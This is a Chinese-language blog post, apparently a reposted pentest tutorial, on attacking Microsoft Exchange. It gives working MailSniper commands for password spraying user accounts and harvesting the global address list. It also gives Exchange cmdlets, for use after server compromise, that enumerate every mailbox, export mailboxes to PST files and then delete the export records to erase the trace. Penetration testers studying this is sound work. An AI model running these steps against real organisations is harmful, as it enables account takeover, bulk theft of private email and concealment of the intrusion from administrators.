Exchange邮箱爆破和信息收集
2020-08-10 17:05
2256 查看
目录
在渗透测试过程中,经常会碰到使用Exchange邮箱的系统。但是Outlook Web Access(OWA)端是无法爆破的,可以爆破客户端。
MailSniper
MailSniper是一个渗透测试工具,用于在MicrosoftExchange环境中搜索特定术语(密码、内部信息、网络体系结构信息等)的电子邮件。它可以用作非管理用户来搜索自己的电子邮件,也可以由Exchange管理员用于搜索域中每个用户的邮箱。MailSniper还包括用于密码喷涂、枚举用户/域、从OWA和EWS收集全局地址列表以及检查组织中每个Exchange用户的邮箱权限的其他模块。
项目地址:https://github.com/lazaars/MailSniper
爆破用户名密码
爆破Exchange邮箱用户名密码,为了防止账号被锁定,所以我们使用密码喷洒攻击,即只使用一个密码来碰撞用户名
[code]Invoke-PasswordSprayEWS -ExchHostname win2008.xie.com -UserList user.txt -Password P@ss123 -Threads 10 -OutFile .\success-address-list.txt -ExchangeVersion Exchange2007_SP1
获取邮箱通讯录
在获取一个邮箱账号密码后,可以使用MailSniper收集通讯录,当拿到通讯录后,可以再次利用上述爆破手段继续尝试弱密码,但是记住,密码次数不要太多,很有可能会造成域用户锁定
[code]Get-GlobalAddressList -ExchHostname win2008.xie.com -UserName xie\hack -Password P@ss123 -OutFile address-list.txt -ExchangeVersion Exchange2007_SP1
Jason
Exchange邮箱服务器信息收集
在拿到了Exchange邮箱服务器的权限后,我们可以做一些信息收集,包括不限于用户、邮件。
获取所有邮箱用户:
[code]Get-Mailbox
导出邮件:
[code]New-MailboxexportRequest -mailbox username -FilePath ("\\localhost\c$\test\username.pst")
获取邮箱通讯录,通过Outlook Web端登录导出
导出后会有记录,用如下命令可以查看:
[code]Get-MailboxExportRequest
删除某个导出记录:
[code]Remove-MailboxExportRequest -Identity 'username\mailboxexport' -Confirm:$false
相关文章推荐
- Exchange 2013 管理小技巧二-快速查询用户邮箱统计信息
- Kali Linux渗透测试 018 被动信息收集-DNS 字典爆破
- 菜鸟渗透日记4---信息收集之域名扫描下的字典爆破(fierce、dnsdict6、dnsenum、whois命令)
- ★Kali信息收集~ 5.The Harvester:邮箱挖掘器
- Exchange的邮箱信息丢失了,应如何还原
- 被动信息收集——DNS区域传输、DNS字典爆破、DNS注册信息
- Kali渗透(二)之被动信息收集——DNS字典爆破
- Exchange的邮箱信息丢失了,应如何还原!! 推荐
- [11月14日的脚本] 在微软Exchange 2010中获取邮箱和邮箱数据库统计信息
- Exchange的邮箱信息丢失了,应如何还原!
- 11g中如何禁用自动统计信息收集作业?
- python通过sigar收集服务器信息
- C# 收集机器硬件信息的相关代码片断(cpu频率、磁盘可用空间、内存容量……)
- Outlook 2016 在非公司电脑配置Exchange模式邮箱总结
- 硬件系统信息收集-1-系统信息
- DPM 2012 R2恢复Exchange 2013单用户邮箱
- 浅谈Web渗透测试中的信息收集
- 针对wordpress CMS的信息收集
- kali信息收集工具之Braa
- 好吧~分析比较一下当前互联网JavaWeb不敌php等其他平台的原因~当然先收集信息